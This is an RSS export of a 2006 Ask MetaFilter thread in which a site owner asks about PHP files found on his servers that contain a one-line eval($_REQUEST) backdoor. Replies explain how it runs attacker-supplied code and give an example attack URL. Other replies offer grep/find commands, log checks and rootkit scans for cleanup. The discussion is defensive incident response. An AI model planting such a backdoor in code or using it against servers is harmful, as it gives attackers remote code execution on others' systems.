<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
     xmlns:admin="http://webns.net/mvcb/"
     xmlns:content="http://purl.org/rss/1.0/modules/content/"
     xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
	<channel> 

      <title>Comments on: Web site hack?</title>
      <link>http://ask.metafilter.com/33491/Web-site-hack/</link>
      <description>Comments on Ask MetaFilter post Web site hack?</description>
	  	  <pubDate>Tue, 28 Feb 2006 10:16:03 -0800</pubDate>
      <lastBuildDate>Tue, 28 Feb 2006 10:16:03 -0800</lastBuildDate>
      <language>en-us</language>
	  <docs>http://blogs.law.harvard.edu/tech/rss</docs>
	  <ttl>60</ttl>

<item>
  	<title>Question: Web site hack?</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack</link>	
  	<description>Web site hacking attempts courtesy of &quot;rory&quot;. &lt;br /&gt;&lt;br /&gt; So I&apos;ve seen several unknown files littered on the server side web site directories, usually a php file with code that includes:&lt;br&gt;
&lt;br&gt;
&lt;code&gt;eval(stripslashes($_REQUEST[rory])&lt;/code&gt;&lt;br&gt;
&lt;br&gt;
or some variation of &quot;rory was here&quot;. I assume these are hacking/backdoor attempts on the server, but I can&apos;t find specific information or links about that specific type of code.&lt;br&gt;
&lt;br&gt;
Does anyone have any information about this &quot;hack&quot;? &lt;br&gt;
&lt;br&gt;
I&apos;ve tried using &lt;em&gt;grep&lt;/em&gt; to check other files on the server, but it doesn&apos;t seem to be returning any results for &quot;rory&quot; (which isn&apos;t correct). What would be the proper &lt;em&gt;grep&lt;/em&gt; command to search all the files for this code? What unix command would I use to check the server to see any changed files or owned by www, etc.?</description>
  	<guid isPermaLink="false">post:ask.metafilter.com,2008:site.33491</guid>
  	<pubDate>Tue, 28 Feb 2006 10:06:43 -0800</pubDate>
  	<dc:creator>jca</dc:creator>
	
	<category>hacking</category>
	
	<category>security</category>
	
</item>
<item>
  	<title>By: IshmaelGraves</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522025</link>	
  	<description>From your document root:&lt;br&gt;
&lt;br&gt;
grep -r rory *</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522025</guid>
  	<pubDate>Tue, 28 Feb 2006 10:16:03 -0800</pubDate>
  	<dc:creator>IshmaelGraves</dc:creator>
</item>
<item>
  	<title>By: Kickstart70</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522036</link>	
  	<description>or, for easier parsing:&lt;br&gt;
&lt;pre&gt;&lt;br&gt;
Files:&lt;br&gt;
find / -type f -name \*rory\*&lt;br&gt;
&lt;br&gt;
Directories:&lt;br&gt;
find / -type d -name \*rory\*&lt;br&gt;
&lt;br&gt;
&lt;/pre&gt;</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522036</guid>
  	<pubDate>Tue, 28 Feb 2006 10:22:34 -0800</pubDate>
  	<dc:creator>Kickstart70</dc:creator>
</item>
<item>
  	<title>By: jca</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522038</link>	
  	<description>I&apos;d be curious if others could run the &amp;quot;grep -r rory *&amp;quot; on their web server(s) and tell us if they see any results.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522038</guid>
  	<pubDate>Tue, 28 Feb 2006 10:23:42 -0800</pubDate>
  	<dc:creator>jca</dc:creator>
</item>
<item>
  	<title>By: uncle harold</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522039</link>	
  	<description>&lt;em&gt;Does anyone have any information about this &amp;quot;hack&amp;quot;? &lt;/em&gt;&lt;br&gt;
&lt;br&gt;
I&apos;m not sure if you mean &amp;quot;about the occurrence this mode of attack&amp;quot;, or if you mean &amp;quot;what does this code do&amp;quot;.&lt;br&gt;
&lt;br&gt;
Just in case: It will execute PHP code send to the server in a string set to the request variable &amp;quot;rory&amp;quot; (using POST or GET).&lt;br&gt;
&lt;br&gt;
It can do anything to your server you could do yourself using PHP. Remove ASAP.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522039</guid>
  	<pubDate>Tue, 28 Feb 2006 10:23:50 -0800</pubDate>
  	<dc:creator>uncle harold</dc:creator>
</item>
<item>
  	<title>By: uncle harold</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522040</link>	
  	<description>But the far more interesting thing is to find out how it got there.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522040</guid>
  	<pubDate>Tue, 28 Feb 2006 10:24:41 -0800</pubDate>
  	<dc:creator>uncle harold</dc:creator>
</item>
<item>
  	<title>By: Kickstart70</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522041</link>	
  	<description>Doh...I didn&apos;t give a decent answer...ignore the above.&lt;br&gt;
&lt;pre&gt;&lt;br&gt;
Files:&lt;br&gt;
find / -type f | xargs grep rory&lt;br&gt;
&lt;br&gt;
Recursive directories:&lt;br&gt;
find / -type d | xargs grep -r rory&lt;br&gt;
&lt;/pre&gt;&lt;br&gt;
Is it just me or does the PRE tags include lots of junk space?</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522041</guid>
  	<pubDate>Tue, 28 Feb 2006 10:26:42 -0800</pubDate>
  	<dc:creator>Kickstart70</dc:creator>
</item>
<item>
  	<title>By: jca</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522049</link>	
  	<description>&lt;i&gt;It will execute PHP code send to the server in a string set to the request variable &amp;quot;rory&amp;quot; (using POST or GET).&lt;/i&gt;&lt;br&gt;
&lt;br&gt;
How would you show what the variable &amp;quot;rory&amp;quot; is currently set to?&lt;br&gt;
&lt;br&gt;
&lt;i&gt;But the far more interesting thing is to find out how it got there.&lt;/i&gt;&lt;br&gt;
&lt;br&gt;
That&apos;s what I&apos;d like to know, hence the question. Can&apos;t find any links that reference useful information about that code. I assume it got there through a vulnerability in some other script, such as phpadsnew or...?</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522049</guid>
  	<pubDate>Tue, 28 Feb 2006 10:31:06 -0800</pubDate>
  	<dc:creator>jca</dc:creator>
</item>
<item>
  	<title>By: uncle harold</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522057</link>	
  	<description>The request variables are set each time a request to the page is made, so while you can display its content, that will be worthless in this case - because it will depend on what you (or rather, the attacker) sends in the request.&lt;br&gt;
&lt;br&gt;
The attacker would do something like http://www.jcaserver.org/hack.php?rory=somephpcommandhere</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522057</guid>
  	<pubDate>Tue, 28 Feb 2006 10:38:21 -0800</pubDate>
  	<dc:creator>uncle harold</dc:creator>
</item>
<item>
  	<title>By: jca</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522060</link>	
  	<description>Well, I&apos;ve seen it on several unrelated sites (different hosts, servers, software used, etc.), so I&apos;m willing to bet if others run that previous &lt;i&gt;grep&lt;/i&gt; they might see some results. :(</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522060</guid>
  	<pubDate>Tue, 28 Feb 2006 10:44:16 -0800</pubDate>
  	<dc:creator>jca</dc:creator>
</item>
<item>
  	<title>By: trevyn</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522071</link>	
  	<description>Mac OS X Server, no rories here.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522071</guid>
  	<pubDate>Tue, 28 Feb 2006 10:51:36 -0800</pubDate>
  	<dc:creator>trevyn</dc:creator>
</item>
<item>
  	<title>By: poppo</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522074</link>	
  	<description>you didn&apos;t give a lot of information about your webserver, which might be helpful...what OS, what webserver.  these might help in the suggestions we could give&lt;br&gt;
&lt;br&gt;
in any case, one thing is to start checking logs.  depending on how your webserver is configured it might be logging all the gets and posts.  start looking for requests that you aren&apos;t normal for your webapp.&lt;br&gt;
&lt;br&gt;
you might try to use a tool like chkrootkit to determine if the system if completely rooted at the OS level, or if they&apos;ve just taken advantage of a weakness in a webapp you were using.&lt;br&gt;
&lt;br&gt;
the unknown files you&apos;ve found:  what are their dates and times and can you correlate this with any other dates and times either in the logs on the webserver (not only web logs but other system logs as well) or with the logs of your firewall and/or routers.&lt;br&gt;
&lt;br&gt;
what are the names of the unknown files you found?  that might help you determine what exact hack you are facing.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522074</guid>
  	<pubDate>Tue, 28 Feb 2006 10:54:22 -0800</pubDate>
  	<dc:creator>poppo</dc:creator>
</item>
<item>
  	<title>By: adamrice</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522081</link>	
  	<description>I made myself vulnerable to a similar attack once because I used php includes that were called in the form of URLs like &lt;code&gt;mydomain.com/index.php?page=somepage&lt;/code&gt;. Apparently, people tricksier than me were able to substitute something special for &amp;quot;somepage&amp;quot; that allowed them to execute their own code and load up their own pages to my site.&lt;br&gt;
&lt;br&gt;
Oops.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522081</guid>
  	<pubDate>Tue, 28 Feb 2006 10:55:44 -0800</pubDate>
  	<dc:creator>adamrice</dc:creator>
</item>
<item>
  	<title>By: borkencode</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522095</link>	
  	<description>Not a single rory found here (but I just run my own blog).&lt;br&gt;
&lt;br&gt;
I agree with uncle harold that the far more interesting story is how they got there.&lt;br&gt;
You say you&apos;ve seen them in several unrelated sites, do you run all these? Do you provide hosting? &lt;br&gt;
Is there a common link between where you&apos;ve seen them? eg Operating system, webserver, php version, software that runs the site, configuration of any of the above.&lt;br&gt;
&lt;br&gt;
Simply removing them will NOT do any good if you don&apos;t know HOW they got there.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522095</guid>
  	<pubDate>Tue, 28 Feb 2006 11:09:40 -0800</pubDate>
  	<dc:creator>borkencode</dc:creator>
</item>
<item>
  	<title>By: jca</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522101</link>	
  	<description>Well, that&apos;s why I posted the question -- trying to find if they&apos;re associated with a particular hack, vunerable software, etc. in order to figure out how they got there.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522101</guid>
  	<pubDate>Tue, 28 Feb 2006 11:18:54 -0800</pubDate>
  	<dc:creator>jca</dc:creator>
</item>
<item>
  	<title>By: Kickstart70</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522103</link>	
  	<description>Files on a webserver (Debian, running apache) that include &apos;rory&apos;.&lt;br&gt;
&lt;br&gt;
Binary file /usr/lib/bitchx/plugins/aim.so matches&lt;br&gt;
/usr/src/linux-2.6.14/fs/super.c: *     Drops an active reference to superblock, acquiring a temprory one if&lt;br&gt;
/usr/src/linux-2.6.14/arch/arm/mach-iop3xx/iop321-irq.c: * Author: Rory Bolt &lt;rorybolt @pacbell.net&gt;&lt;br&gt;
/usr/src/linux-2.6.14/arch/arm/mach-iop3xx/iop321-pci.c: * Author: Rory Bolt &lt;rorybolt @pacbell.net&gt;&lt;br&gt;
/usr/src/linux-2.6.14/arch/arm/mach-iop3xx/iq80321-mm.c: * Author: Rory Bolt &lt;rorybolt @pacbell.net&gt;&lt;br&gt;
/usr/src/linux-2.6.14/arch/arm/mach-iop3xx/iq31244-pci.c: * Author: Rory Bolt &lt;rorybolt @pacbell.net&gt;&lt;br&gt;
/usr/src/linux-2.6.14/arch/arm/mach-iop3xx/iq31244-mm.c: * Author: Rory Bolt &lt;rorybolt @pacbell.net&gt;&lt;br&gt;
/usr/src/linux-2.6.14/arch/arm/mach-iop3xx/iq80321-pci.c: * Author: Rory Bolt &lt;rorybolt @pacbell.net&gt;&lt;br&gt;
/usr/src/linux-2.6.14/include/asm-arm/arch-iop3xx/iop321.h: * Author: Rory Bolt &lt;rorybolt @pacbell.net&gt;&lt;br&gt;
/usr/src/linux-2.6.14/include/asm-arm/arch-iop3xx/iop321-irqs.h: * Author:     Rory Bolt &lt;rorybolt @pacbell.net&gt;&lt;br&gt;
/usr/share/vim/vim64/syntax/docbk.vim:&amp;quot; Add special emphasis on some regions. Thanks to Rory Hunter &lt;roryh @dcs.ed.ac.uk&gt; for these ideas.&lt;/rorybolt&gt;&lt;/rorybolt&gt;&lt;/rorybolt&gt;&lt;/rorybolt&gt;&lt;/rorybolt&gt;&lt;/rorybolt&gt;&lt;/rorybolt&gt;&lt;/rorybolt&gt;&lt;/roryh&gt;</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522103</guid>
  	<pubDate>Tue, 28 Feb 2006 11:20:01 -0800</pubDate>
  	<dc:creator>Kickstart70</dc:creator>
</item>
<item>
  	<title>By: jca</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522105</link>	
  	<description>(&lt;a href=&quot;http://phpadsnew&quot;&gt;phpadsnew&lt;/a&gt; seems a likely candidate, but I&apos;m assuming many php scripts would be vulnerable?)</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522105</guid>
  	<pubDate>Tue, 28 Feb 2006 11:20:38 -0800</pubDate>
  	<dc:creator>jca</dc:creator>
</item>
<item>
  	<title>By: yerfatma</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522123</link>	
  	<description>&lt;a href=&quot;http://www.google.com/search?lr=&amp;ie=UTF-8&amp;oe=UTF-8&amp;q=eval(stripslashes(%24_REQUEST%5Brory%5D)&quot;&gt;Google query&lt;/a&gt;</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522123</guid>
  	<pubDate>Tue, 28 Feb 2006 11:32:06 -0800</pubDate>
  	<dc:creator>yerfatma</dc:creator>
</item>
<item>
  	<title>By: poppo</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522129</link>	
  	<description>first link in yerfatma&apos;s query is perfect, if jca has a postnuke forum.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522129</guid>
  	<pubDate>Tue, 28 Feb 2006 11:37:08 -0800</pubDate>
  	<dc:creator>poppo</dc:creator>
</item>
<item>
  	<title>By: jca</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522130</link>	
  	<description>I&apos;ve seen that single postnuke forum mention (via Google), but it didn&apos;t shed any light on the problem.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522130</guid>
  	<pubDate>Tue, 28 Feb 2006 11:37:53 -0800</pubDate>
  	<dc:creator>jca</dc:creator>
</item>
<item>
  	<title>By: jca</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522132</link>	
  	<description>(not running postnuke)</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522132</guid>
  	<pubDate>Tue, 28 Feb 2006 11:38:24 -0800</pubDate>
  	<dc:creator>jca</dc:creator>
</item>
<item>
  	<title>By: sailormouth</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522135</link>	
  	<description>Open your raw log file that would have entries from the date the files from rory were created. Then search for &amp;quot;cmd&amp;quot; or &amp;quot;txt&amp;quot; (owned.txt, test.txt) or &amp;quot;cse&amp;quot; (usually cse.jpg).</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522135</guid>
  	<pubDate>Tue, 28 Feb 2006 11:41:02 -0800</pubDate>
  	<dc:creator>sailormouth</dc:creator>
</item>
<item>
  	<title>By: jca</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522140</link>	
  	<description>no log files going back to the date of the hacked file(s).&lt;br&gt;
&lt;br&gt;
phpBB seems vulnerable to a &lt;a href=&quot;http://www.google.com/search?q=%22eval%28stripslashes%28%24_REQUEST%5Bnigga%5D%29%22&quot;&gt;&amp;quot;friend&amp;quot;&lt;/a&gt;  of rory. (I&apos;m not running phpBB).</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522140</guid>
  	<pubDate>Tue, 28 Feb 2006 11:46:57 -0800</pubDate>
  	<dc:creator>jca</dc:creator>
</item>
<item>
  	<title>By: poppo</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522142</link>	
  	<description>in that forum, it mentions that the exploitable part of it was the XMLRpc module.  Perhaps this is used in another php based app on your webserver?&lt;br&gt;
&lt;br&gt;
for example, it is also used in &lt;a href=&quot;http://it.slashdot.org/article.pl?sid=05/07/04/2153224&amp;from=rss&quot;&gt;Wordpress, Drupal, PostNuke, Serendipity, phpAdsNew, phpWiki and many more&lt;/a&gt;.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522142</guid>
  	<pubDate>Tue, 28 Feb 2006 11:47:41 -0800</pubDate>
  	<dc:creator>poppo</dc:creator>
</item>
<item>
  	<title>By: poppo</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522153</link>	
  	<description>a longer list from the &lt;a href=&quot;http://phpxmlrpc.sourceforge.net/&quot;&gt;sourceforge page for xmlrpc&lt;/a&gt;:  PHPXMLRPC or derivative versions are used in many open source projects, including Ampache, Xaraya, Drupal (only up to releases 4.6.2 and 4.5.4), PostNuke, b2evolution, nucleus cms, phpmyfaq, phpPgAds, phpgroupware, egroupware, TikiWiki, Civicspace (old release only) and MailWatch for MailScanner.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522153</guid>
  	<pubDate>Tue, 28 Feb 2006 11:53:23 -0800</pubDate>
  	<dc:creator>poppo</dc:creator>
</item>
<item>
  	<title>By: poppo</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522156</link>	
  	<description>or, just see if xmlrpc.php exists on your webserver</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522156</guid>
  	<pubDate>Tue, 28 Feb 2006 11:54:46 -0800</pubDate>
  	<dc:creator>poppo</dc:creator>
</item>
<item>
  	<title>By: nomisxid</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522161</link>	
  	<description>Kickstart, a single find command is all that is needed&lt;br&gt;
&lt;br&gt;
find . -name \*.php -exec grep &apos;rory&apos; {} \; -print</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522161</guid>
  	<pubDate>Tue, 28 Feb 2006 11:59:39 -0800</pubDate>
  	<dc:creator>nomisxid</dc:creator>
</item>
<item>
  	<title>By: andrew cooke</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522232</link>	
  	<description>do you have xmlrpc.php anywhere?</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522232</guid>
  	<pubDate>Tue, 28 Feb 2006 13:40:22 -0800</pubDate>
  	<dc:creator>andrew cooke</dc:creator>
</item>
<item>
  	<title>By: Rhomboid</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522393</link>	
  	<description>Use xargs instead of -exec with find.  It&apos;s much more efficient to run grep once with all the files on the command line rather than having to invoke grep once for each file.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522393</guid>
  	<pubDate>Tue, 28 Feb 2006 17:15:14 -0800</pubDate>
  	<dc:creator>Rhomboid</dc:creator>
</item>
<item>
  	<title>By: camworld</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522489</link>	
  	<description>My logs are always full of every kind of exploit/attack known to hackers, regardless of whether or not I am running the software they are trying to explot.&lt;br&gt;
&lt;br&gt;
There are a lot of scum out there who have automated this process and let it run continuously, trying every exploit against every server they can find. When they get a hit (find a vulnerable server running insecure software) they then take control in whatever way they can and use your server for whatever means they want.&lt;br&gt;
&lt;br&gt;
Twice last year my server was hacked because I was too lazy to keep awstats updated. Both times the hacker gained root-level acccess (because I was dumb and installed awsats from root) and installed software that then proceeded to try and exploit other servers. Both times I had to bring the server down, dump the databases and web files to a different server, re-install Debian and reconfigure everything. The first time the server was hacked it was done by some weird group of Brazilian hackers who were in a weird contest with other hackers to see hwo many servers they could hack in a period of time (weird, I know). They didn&apos;t install anything but a script that rewrote ever index.* page on the site with their hacked message.&lt;br&gt;
&lt;br&gt;
I suck at being a sysadmin, but the few years I did run my own server I had to learn a lot. What I came away with is that you can never be truly secure unless you monitor the server constantly and keep on top of security patches.&lt;br&gt;
&lt;br&gt;
So, seeing &amp;quot;eval(stripslashes($_REQUEST[rory])&amp;quot; in your logs really doesn&apos;t mean anything except that scum are running a known exploit against your server looking for unpatched software regardless of whether you are running that software or not.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522489</guid>
  	<pubDate>Tue, 28 Feb 2006 18:56:26 -0800</pubDate>
  	<dc:creator>camworld</dc:creator>
</item>
<item>
  	<title>By: ook</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522571</link>	
  	<description>camworld, these aren&apos;t in the logs, they&apos;re executable files stored inside the webspace.&lt;br&gt;
&lt;br&gt;
&lt;i&gt;How would you show what the variable &amp;quot;rory&amp;quot; is currently set to?&lt;/i&gt;&lt;br&gt;
&lt;br&gt;
It&apos;s a back door; whoever put those files there could go to a url matching one of the files, include &amp;amp;rory=[any executable code] in the url, and that executable code would run on your system.  Presumably to do something unpleasant.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522571</guid>
  	<pubDate>Tue, 28 Feb 2006 20:27:24 -0800</pubDate>
  	<dc:creator>ook</dc:creator>
</item>
<item>
  	<title>By: ook</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522575</link>	
  	<description>To be more specific: these are not &amp;quot;hacking attempts&amp;quot; -- you have already been hacked, successfully, and your system is currently wide open to anyone who knows where those files are.  Your first task is to delete those files.  &lt;br&gt;
&lt;br&gt;
As for how they got in in the first place, I don&apos;t know, but if I were you I would disable absolutely everything on the sever that I wasn&apos;t actively using, and make sure everything else is upgraded to the most current version.  I&apos;d also be backing up my files to a different box right now.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522575</guid>
  	<pubDate>Tue, 28 Feb 2006 20:31:16 -0800</pubDate>
  	<dc:creator>ook</dc:creator>
</item>
<item>
  	<title>By: madman</title>
  	<link>http://ask.metafilter.com/33491/Web-site-hack#522667</link>	
  	<description>&lt;i&gt;To be more specific: these are not &amp;quot;hacking attempts&amp;quot; -- you have already been hacked, successfully&lt;/i&gt;&lt;br&gt;
&lt;br&gt;
Yep, I was surprised nobody seemed to think much of that.&lt;br&gt;
&lt;br&gt;
If a file is already on your server, that means the person who put it there had access to the server. You have a bigger problem than you imagined. Yank off your Net connection and find out the cause first.</description>
  	<guid isPermaLink="false">comment:ask.metafilter.com,2008:site.33491-522667</guid>
  	<pubDate>Tue, 28 Feb 2006 23:48:30 -0800</pubDate>
  	<dc:creator>madman</dc:creator>
</item>

    </channel>
</rss>
